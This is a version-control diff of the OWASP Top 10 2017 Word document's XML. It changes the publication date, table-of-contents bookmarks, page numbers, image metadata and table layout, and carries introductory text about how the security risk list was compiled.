   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/2017/OWASP-Top-10-2017-en.docx
+++ b/2017/OWASP-Top-10-2017-en.docx
@@ -79,7 +79,7 @@
         <w:t xml:space="preserve">October </w:t>
       </w:r>
       <w:r>
-        <w:t>25</w:t>
+        <w:t>28</w:t>
       </w:r>
       <w:r>
         <w:t>, 2017</w:t>
@@ -161,7 +161,7 @@
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="1746"/>
-        <w:gridCol w:w="7614"/>
+        <w:gridCol w:w="7830"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -278,7 +278,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="2" w:name="gm-golden-master"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc496719098"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc496914291"/>
       <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -516,14 +516,15 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="6" w:name="toc"/>
-      <w:bookmarkStart w:id="7" w:name="_Toc496719099"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc496914292"/>
       <w:bookmarkEnd w:id="6"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>TOC</w:t>
+        <w:t>Table of Contents</w:t>
       </w:r>
       <w:bookmarkEnd w:id="7"/>
     </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="TOC1"/>
@@ -546,7 +547,7 @@
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="_Toc496719098" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914291" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -573,7 +574,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719098 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914291 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -617,13 +618,13 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719099" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>TOC</w:t>
+      <w:hyperlink w:anchor="_Toc496914292" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Table of Contents</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -644,7 +645,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719099 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914292 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -688,7 +689,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719100" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914293" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -715,7 +716,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719100 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914293 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -759,7 +760,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719101" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914294" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -786,7 +787,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719101 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914294 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -830,7 +831,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719102" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914295" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -857,7 +858,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719102 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914295 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -901,7 +902,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719103" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914296" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -928,7 +929,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719103 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914296 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -972,7 +973,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719104" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914297" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -999,7 +1000,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719104 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914297 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1043,7 +1044,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719105" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914298" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1070,7 +1071,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719105 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914298 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1114,7 +1115,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719106" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914299" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1141,7 +1142,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719106 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914299 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1185,7 +1186,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719107" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914300" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1212,7 +1213,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719107 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914300 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1256,7 +1257,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719108" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914301" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1283,7 +1284,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719108 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914301 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1303,7 +1304,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>20</w:t>
+          <w:t>21</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1327,7 +1328,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719109" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914302" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1354,7 +1355,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719109 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914302 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1374,7 +1375,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>22</w:t>
+          <w:t>23</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1398,7 +1399,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719110" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914303" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1425,7 +1426,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719110 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914303 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1445,7 +1446,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>24</w:t>
+          <w:t>25</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1469,7 +1470,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719111" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914304" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1496,7 +1497,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719111 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914304 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1516,7 +1517,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>26</w:t>
+          <w:t>27</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1540,7 +1541,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719112" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914305" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1567,7 +1568,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719112 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914305 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1587,7 +1588,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>28</w:t>
+          <w:t>29</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1611,7 +1612,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719113" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914306" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1638,7 +1639,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719113 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914306 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1658,7 +1659,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>30</w:t>
+          <w:t>31</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1682,7 +1683,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719114" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914307" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1709,7 +1710,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719114 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914307 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1729,7 +1730,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>32</w:t>
+          <w:t>33</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1753,7 +1754,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719115" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914308" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1780,7 +1781,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719115 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914308 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1800,7 +1801,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>34</w:t>
+          <w:t>35</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1824,7 +1825,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719116" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914309" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1851,7 +1852,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719116 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914309 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1871,7 +1872,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>35</w:t>
+          <w:t>36</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1895,7 +1896,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719117" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914310" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1922,7 +1923,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719117 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914310 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1942,7 +1943,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>36</w:t>
+          <w:t>37</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1966,7 +1967,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719118" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914311" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1993,7 +1994,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719118 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914311 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2013,7 +2014,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>38</w:t>
+          <w:t>39</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2037,7 +2038,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719119" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914312" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2064,7 +2065,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719119 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914312 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2084,7 +2085,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>40</w:t>
+          <w:t>41</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2108,7 +2109,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719120" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914313" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2135,7 +2136,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719120 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914313 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2155,7 +2156,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>42</w:t>
+          <w:t>43</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2179,7 +2180,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719121" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914314" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2206,7 +2207,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719121 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914314 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2226,7 +2227,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>43</w:t>
+          <w:t>44</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2250,7 +2251,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719122" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914315" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2277,7 +2278,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719122 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914315 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2297,7 +2298,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>45</w:t>
+          <w:t>46</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2321,7 +2322,7 @@
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc496719123" w:history="1">
+      <w:hyperlink w:anchor="_Toc496914316" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2348,7 +2349,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc496719123 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc496914316 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2368,7 +2369,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>48</w:t>
+          <w:t>49</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2380,9 +2381,6 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
       <w:r>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
@@ -2392,7 +2390,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="8" w:name="o-about-owasp"/>
-      <w:bookmarkStart w:id="9" w:name="_Toc496719100"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc496914293"/>
       <w:bookmarkEnd w:id="8"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -2888,7 +2886,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="13" w:name="i-introduction"/>
-      <w:bookmarkStart w:id="14" w:name="_Toc496719101"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc496914294"/>
       <w:bookmarkEnd w:id="13"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -2976,34 +2974,29 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>The OWASP</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="16" w:name="_GoBack"/>
+        <w:t>The OWASP Top 10 for 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was completed by 515 individuals. This data spans vulnerabilities g</w:t>
+      </w:r>
+      <w:r>
+        <w:t>athered from hundreds of organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses. The Top 10 provides basic techniques to protec</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t against these high risk problem areas, and provides guidance on where to go from here.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="roadmap-for-future-activities"/>
       <w:bookmarkEnd w:id="16"/>
-      <w:r>
-        <w:t xml:space="preserve"> Top 10 for 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was completed by 515 individuals. This data spans vulnerabilities g</w:t>
-      </w:r>
-      <w:r>
-        <w:t>athered from hundreds of organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses. The Top 10 provides basic techniques to protec</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t against these high risk problem areas, and provides guidance on where to go from here.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="roadmap-for-future-activities"/>
-      <w:bookmarkEnd w:id="17"/>
       <w:r>
         <w:t>Roadmap for future activities</w:t>
       </w:r>
@@ -3152,8 +3145,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="attribution"/>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkStart w:id="17" w:name="attribution"/>
+      <w:bookmarkEnd w:id="17"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Attribution</w:t>
@@ -3224,21 +3217,21 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="rn-release-notes"/>
-      <w:bookmarkStart w:id="20" w:name="_Toc496719102"/>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkStart w:id="18" w:name="rn-release-notes"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc496914295"/>
+      <w:bookmarkEnd w:id="18"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>RN Release Notes</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="what-changed-from-2013-to-2017"/>
       <w:bookmarkEnd w:id="20"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="what-changed-from-2013-to-2017"/>
-      <w:bookmarkEnd w:id="21"/>
       <w:r>
         <w:t>What changed from 2013 to 2017?</w:t>
       </w:r>
@@ -3499,6 +3492,7 @@
       <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_GoBack"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3506,39 +3500,39 @@
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="3314980"/>
+            <wp:extent cx="5943600" cy="3213735"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="5" name="Picture" descr="0x06-release-notes-1"/>
-            <wp:cNvGraphicFramePr/>
+            <wp:docPr id="9" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture" descr="images/0x06-release-notes-1.png"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
+                    <pic:cNvPr id="9" name="0x06-release-notes-1.png"/>
+                    <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId23">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3314980"/>
+                      <a:ext cx="5943600" cy="3213735"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -3546,13 +3540,14 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="22" w:name="risk---application-security-risks"/>
-      <w:bookmarkStart w:id="23" w:name="_Toc496719103"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc496914296"/>
       <w:bookmarkEnd w:id="22"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -3681,12 +3676,12 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1207"/>
+        <w:gridCol w:w="1236"/>
         <w:gridCol w:w="1319"/>
-        <w:gridCol w:w="1760"/>
-        <w:gridCol w:w="1876"/>
-        <w:gridCol w:w="1488"/>
-        <w:gridCol w:w="1710"/>
+        <w:gridCol w:w="1802"/>
+        <w:gridCol w:w="1923"/>
